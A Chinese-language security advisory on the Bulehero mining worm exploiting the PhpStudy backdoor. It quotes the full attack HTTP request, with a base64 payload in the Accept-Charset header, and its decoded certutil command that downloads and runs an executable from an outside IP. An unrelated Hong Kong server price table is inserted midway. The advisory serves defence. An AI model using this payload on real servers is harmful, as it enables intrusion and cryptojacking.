近日,有国内安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows系统的服务器进行攻击,入侵成功后会下载门罗币挖矿程序进行牟利。该挖矿程序会大肆抢占服务器CPU资源进行门罗币的挖掘,造成服务器卡顿,严重影响正常业务运行,甚至造成业务终端。关于该蠕虫最早曝光于2018年7月,蠕虫自出现后频繁更新,陆续加入多达数十种的的攻击方式,可以预计该黑客团伙将会不断的寻找新的攻击方式来植入其恶意程序。
PhpStudy是国内的一款免费的PHP调试环境的程序集成包,在国内有着近百万的PHP语言学习者和开发者用户。在2019年9月20日,网上爆出PhpStudy存在“后门”:黑客早在2016年就编写了“后门”文件,并非法侵入了PhpStudy的官网,篡改了软件安装包植入“后门”。该“后门”具有远程控制计算机的功能,可以远程控制下载运行脚本实现用户个人信息收集。据报道黑客利用该漏洞共非法控制计算机67万余台,非法获取大量账号密码类、聊天数据类、设备码类等数据10万余组。该“后门”除了会造成挖矿和信息泄露,还有可能被勒索病毒利用,服务器关键数据被勒索病毒加密后将无法找回,给被害者造成大量的数据、经济损失。
| 序列号 | CPU | RAM | HDD | 带宽 | 售价(美元) | 免费试用 |
|---|---|---|---|---|---|---|
| 香港服务器1 | E5-2620 | 32G | 1T HDD | 50M/无限流量 | $196.00 | 立即申请 |
| 香港服务器2 | E5-2650 | 32G | 1T HDD | 50M/无限流量 | $256.00 | 立即申请 |
| 香港服务器3 | E5-2680 | 32G | 1T HDD | 50M/无限流量 | $316.00 | 立即申请 |
| 香港服务器4 | E5-2690 | 32G | 1T HDD | 50M/无限流量 | $336.00 | 立即申请 |
| 香港服务器5 | E5-2697 | 32G | 1T HDD | 50M/无限流量 | $376.00 | 立即申请 |
| 香港服务器6 | E5-2620*2 | 32G | 1T HDD | 50M/无限流量 | $376.00 | 立即申请 |
| 香港服务器7 | E5-2650*2 | 32G | 1T HDD | 50M/无限流量 | $436.00 | 立即申请 |
| 香港服务器8 | E5-2680*2 | 32G | 1T HDD | 50M/无限流量 | $476.00 | 立即申请 |
| 香港服务器9 | E5-2690*2 | 32G | 1T HDD | 50M/无限流量 | $556.00 | 立即申请 |
| 香港服务器10 | E5-2697*2 | 32G | 1T HDD | 50M/无限流量 | $596.00 | 立即申请 |
| 香港服务器11 | E5-2680v4*2 | 32G | 1T HDD | 50M/无限流量 | $696.00 | 立即申请 |
| 香港服务器12 | E5-2698v4*2 | 32G | 1T HDD | 50M/无限流量 | $796.00 | 立即申请 |
攻击者会向被攻击的服务器发送一个利用漏洞的HTTP GET请求,恶意代码存在于请求头的Accept-Charset字段,字段内容经过base64编码。解码后可以发现这是一段windows命令:利用certutil.exe工具下载download.exe
GET/index.phpHTTP/1.1Connection:Keep-AliveAccept:*/*Accept-Charset:c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7Accept-Encoding:gzip,deflateAccept-Language:zh-cnReferer:http://xxx:80/index.phpUser-Agent:Mozilla/4.0(compatible;MSIE9.0;WindowsNT6.1)Host:xxx
解码后内容:
system('certutil.exe-urlcache-split-fhttp://60.164.250.170:3888/download.exe%SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe&%SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echomd5('phpstudy');
被感染的服务器会通过download.exe下载器下载名为ScarupnpLogon.exe的文件。该文件会释放多个打包的恶意文件,这些恶意文件可分为三个模块:挖矿模块、扫描模块、攻击模块。
针对此后门漏洞,服务器用户需要对涉及的漏洞及时修复,否则容易成为挖矿木马的受害者。
建议使用高性能的防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽恶意网站,达到阻断入侵的目的。
